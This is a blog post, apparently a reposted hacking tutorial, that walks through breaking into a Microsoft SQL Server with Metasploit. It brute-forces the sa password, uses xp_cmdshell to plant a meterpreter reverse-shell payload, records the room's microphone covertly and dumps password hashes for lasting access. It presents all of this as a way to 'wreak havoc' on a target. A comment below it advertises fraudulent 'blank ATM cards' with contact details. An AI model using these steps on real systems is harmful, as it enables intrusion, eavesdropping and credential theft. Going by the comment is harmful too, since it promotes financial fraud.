Subscribe For Free Updates!

We'll not spam mate! We promise.

Saturday, 18 January 2014

How to Hack Databases: Cracking SQL Server Passwords & Owning the Server

How to Hack Databases: Cracking SQL Server Passwords 
& Owning the Server
 

In this tutorial, we'll look at how we can crack the password 
on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.

Step 1: Start Metasploit

First, we need to start Metasploit. Once we have the 
metasploit command prompt, we need to define which 
module we want to use. 
In past Metasploit tutorials, we've always used exploits, 
but this one is a bit different. Instead, we will use a  
scanner  among the auxiliary modules that enables us
 to brute force 
the sa password. Let's load up mssql_login:



  • use scanner/mssql/mssql_login



 


As you can see, Metasploit responds by telling us we have successfully loaded this auxiliary 


module. Now let's take a look at the options with this module.


  • show options



Step 2: Set Your Options

In order to run this MS SQL login module, we will need:
  1. A password file,
  2. Set the RHOSTS, and
  3. Determine the number of THREADS we want to run.
BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 c
ommonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, 
our target is at 192.168.1.103, and we will set our THREADS to 20.

 

Step 3: Brute Force the Database Passwords

Now, we simply need to type exploit and it runs through password list until it finds the password
 for the sa account.
  • exploit
  •  
 
As you can see, after testing over 57,000 passwords (it takes a few minutes, so be patient),
 it found the password on our sa account of "NullByte". Success! Now we have full sysadmin 
privileges on the database that we can hopefully convert to full system sysadmin privileges.

 

Step 4: Grab the xp__cmdshell

Now that we have full sysadmin (sa) on the MS SQL database, we are going to leverage that
 to full system sysadmin privileges. MS SQL Server has a stored procedure named xp_cmdshell t
hat enables the sa account to gain a system command shell with full system admin rights. If we can i
nvoke that command shell, we may be able to load the payload of our choice on the system and 
own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this.
 Let's load it.
  • use windows/mssql/mssql_payload
  •  

 
Now, let's check the options for this exploit:
  • show options
In this case, we will try to load the meterpreter on this system, so let's:
  • set PAYLOAD windows/meterpreter/reverse_tcp
In addition, we need to set the LPORT, the LHOST, the RHOST and the password we
 recovered from the sa account from above, in this case, "NullByte".
 
Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.
 
Success! We have a meterpreter session!

 

 

Step 5: Wreak Havoc!

Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, 
we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's
 try a few.

First, let's turn on the microphone and listen in on the conversations of the sysadmin and anyone
 else in the room. Think of it as installing a bug in the room from the old James Bond 007 movies.

  • meterpreter > run sound_recorder -i 100 -l /etc
 
This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etc 
directory. Of course, we can record as much audio as we want. We are only limited by hard drive 
space.

 

Step 6: Grab the Hash


Now, let's grab some passwords so that we can log back back in whenever we please. Remember,
 once we have the admin password, we can login any time with Metasploit's psexec exploit.
  • meterpreter > hashdump



As you can see, we were able to grab the password hashes from the system
.

We then need to either crack the hashes using John the Ripper,


FEEL FREE TO COMMENT<LIKE< ASK QUESTIONS.....

Socialize This Post
SOCIALIZE IT →
FOLLOW →
SHARE IT →

2 comments:

  1. I am a Single full time dad on disability getting no help from their moms. It a struggle every day. My boys are 15 and 9 been doing this by myself for 8 years now it’s completely drained all my savings everything . These guys are the present day ROBIN HOOD. Im back on my feet again and my kids can have a better life all thanks to the blank card i acquired from skylink technology. Now i can withdraw up too 3000 per day Contact them as well on Mail: skylinktechnes@yahoo.com   or   whatsspp/telegram: +1(213)785-1553

    ReplyDelete